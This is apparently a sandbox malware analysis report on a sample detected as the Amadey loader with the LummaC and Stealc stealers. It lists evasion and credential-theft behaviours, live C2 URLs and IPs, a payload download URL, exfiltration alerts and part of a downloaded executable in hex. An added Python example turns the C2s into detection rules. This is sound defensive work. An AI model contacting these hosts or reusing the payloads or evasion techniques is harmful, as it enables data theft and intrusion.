Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565518
MD5: 27a3277f6daec8e2369a88cea407fb46
SHA1: c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256: ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
Tags: exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.206? Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/6802601040/SxQyhJr.exe Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a6f0d09f38.exe.7620.13.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: b5da647ae3.exe.5500.14.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Source: file.exe Virustotal: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_cc3844a9-b
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0EA8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E1618
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E160A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0E98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7698
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7689
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E11DB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 222MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49780 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49798 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49816 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49818 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49839 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49919 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://atten-supporse.biz:443/api
Source: Malware configuration extractor IPs: 185.215.113.43
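The three "Malware Configuration Extractor" lines in the AV Detection section and the C2 URLs/IPs listed just above are the most actionable output of this report, but the C2 values come in three different shapes (a bare host plus path for Amadey, an https URL with an explicit port for LummaC, a plain http URL for Stealc). The following Python is an added example, not part of the Joe Sandbox report or of any of the malware families' code: it parses the extractor lines exactly as printed above, normalizes each C2 value into host, port and path, matches the result against a list of flow records, and renders each IOC as a Suricata rule. The flow records, the function names, the `$HOME_NET`/`$EXTERNAL_NET` variables and the local SID range 9000001+ are all assumptions made for the example; the page does not state which IP atten-supporse.biz resolved to, so the TLS flow below uses a TEST-NET address.

```python
import json
import re
from urllib.parse import urlsplit

# The three extractor lines exactly as they appear in the report above.
CONFIG_LINES = [
    'Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp '
    'Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", '
    '"Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}',
    'Source: a6f0d09f38.exe.7620.13.memstrmin Malware Configuration Extractor: LummaC '
    '{"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}',
    'Source: b5da647ae3.exe.5500.14.memstrmin Malware Configuration Extractor: StealC '
    '{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}',
]

LINE_RE = re.compile(r"Malware Configuration Extractor: (?P<family>\w+) (?P<cfg>\{.*\})\s*$")


def parse_config_lines(lines):
    """Pull (family, config dict) out of each extractor line; the config is JSON."""
    out = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            out.append({"family": m.group("family"), "config": json.loads(m.group("cfg"))})
    return out


def normalize_c2(value):
    """Turn 'host/path', 'http://host/path' or 'https://host:443/path' into one shape."""
    url = value if "://" in value else "http://" + value   # Amadey omits the scheme
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return {"scheme": parts.scheme, "host": parts.hostname, "port": port, "path": parts.path or "/"}


def build_iocs(configs):
    """Every config key starting with 'C2' (string or list) becomes one IOC record."""
    iocs = []
    for c in configs:
        for key, val in c["config"].items():
            if not key.lower().startswith("c2"):
                continue
            for v in (val if isinstance(val, list) else [val]):
                ioc = normalize_c2(v)
                ioc["family"] = c["family"]
                iocs.append(ioc)
    return iocs


# CONSTRUCTED flow records in the shape of a proxy/Zeek-style export; not from the report.
FLOWS = [
    {"src_ip": "192.168.2.4", "dst_ip": "185.215.113.43", "dst_port": 80, "uri": "/Zu7JuNko/index.php"},
    {"src_ip": "192.168.2.4", "dst_ip": "185.215.113.206", "dst_port": 80, "uri": "/c4becf79229cb002.php"},
    {"src_ip": "192.168.2.4", "dst_ip": "203.0.113.10", "dst_port": 443, "server_name": "atten-supporse.biz"},
    {"src_ip": "192.168.2.4", "dst_ip": "203.0.113.20", "dst_port": 443, "server_name": "example.com"},
]


def match_flows(iocs, flows):
    """Match on (TLS SNI, port) first, then (destination IP, port); note whether the URI path matched too."""
    by_host = {(i["host"], i["port"]): i for i in iocs}
    hits = []
    for f in flows:
        for key in ((f.get("server_name"), f["dst_port"]), (f["dst_ip"], f["dst_port"])):
            ioc = by_host.get(key)
            if ioc:
                path_match = f.get("uri") is None or f["uri"] == ioc["path"]
                hits.append({"flow": f, "family": ioc["family"], "path_match": path_match})
                break
    return hits


def to_suricata_rule(ioc, sid):
    """Render one IOC as a Suricata rule using sticky buffers (Suricata 5+ syntax)."""
    msg = f'LOCAL MALWARE {ioc["family"]} C2 ({ioc["host"]})'
    if ioc["scheme"] == "https":
        proto, body = "tls", f'tls.sni; content:"{ioc["host"]}"; nocase;'
    else:
        proto, body = "http", f'http.host; content:"{ioc["host"]}"; http.uri; content:"{ioc["path"]}";'
    return (f'alert {proto} $HOME_NET any -> $EXTERNAL_NET {ioc["port"]} (msg:"{msg}"; '
            f'flow:established,to_server; {body} classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    iocs = build_iocs(parse_config_lines(CONFIG_LINES))
    for n, ioc in enumerate(iocs, start=9000001):
        print(to_suricata_rule(ioc, n))
    for hit in match_flows(iocs, FLOWS):
        print(hit["family"], hit["flow"]["dst_ip"], "path_match=%s" % hit["path_match"])
```

The host/port key is matched before the path on purpose: the Amadey alerts above fire on the POST to 185.215.113.43:80 regardless of URI, and a stealer that rotates its PHP filename still reuses the host. The generated rules are meant to sit beside, not replace, the ET/ETPRO signatures listed above.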
Source: unknown Network traffic detected: DNS query count 31
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:09 GMTContent-Type: application/octet-streamContent-Length: 1473536Last-Modified: Sat, 30 Nov 2024 02:41:31 GMTConnection: keep-aliveETag: "674a7b5b-167c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 eb 15 00 00 20 00 00 00 ec 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fe 8a 00 00 00 20 16 00 00 8c 00 00 00 ee 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 16 00 00 02 00 00 00 7a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 16 00 00 00 00 00 48 00 00 00 02 00 05 00 64 93 14 00 00 78 01 00 03 00 00 00 01 00 00 06 7c a8 00 00 e6 ea 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 73 04 00 00 06 25 6f 02 00 00 06 6f 03 00 00 06 2a b6 02 73 1a 00 00 0a 7d 01 00 00 04 02 7b 01 00 00 04 1b 6f 1b 00 00 0a 02 7b 01 00 00 04 28 08 00 00 06 28 1c 00 00 0a 6f 1d 00 00 0a 2a 1e 02 28 28 00 00 0a 2a 2e 73 06 00 00 06 80 02 00 00 04 2a 1e 02 28 29 00 00 0a 2a 46 03 6f 2a 00 00 0a 72 15 00 00 70 6f 2b 00 00 0a 2a ba 7e 04 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 06 00 00 02 28 23 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 80 04 00 00 04 7e 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 80 05 00 00 04 2a 6a 28 0b 00 00 06 72 e9 00 00 70 7e 05 00 00 04 6f 35 00 00 0a 74 02 00 00 1b 2a 22 02 03 7d 27 00 00 04 2a 5e 02 0e 04 1f 18 62 03 1f 10 62 60 04 1e 62 60 05 60 7d 27 00 00 04 2a 72 02 20 00 00 00 ff 6e 03 1f 10 62 6a 60 04 1e 62 6a 60 05 6a 60 6d 7d 27 00 00 04 2a 66 03 02 28 18 00 00 06 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28 17 00 00 06 03 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28
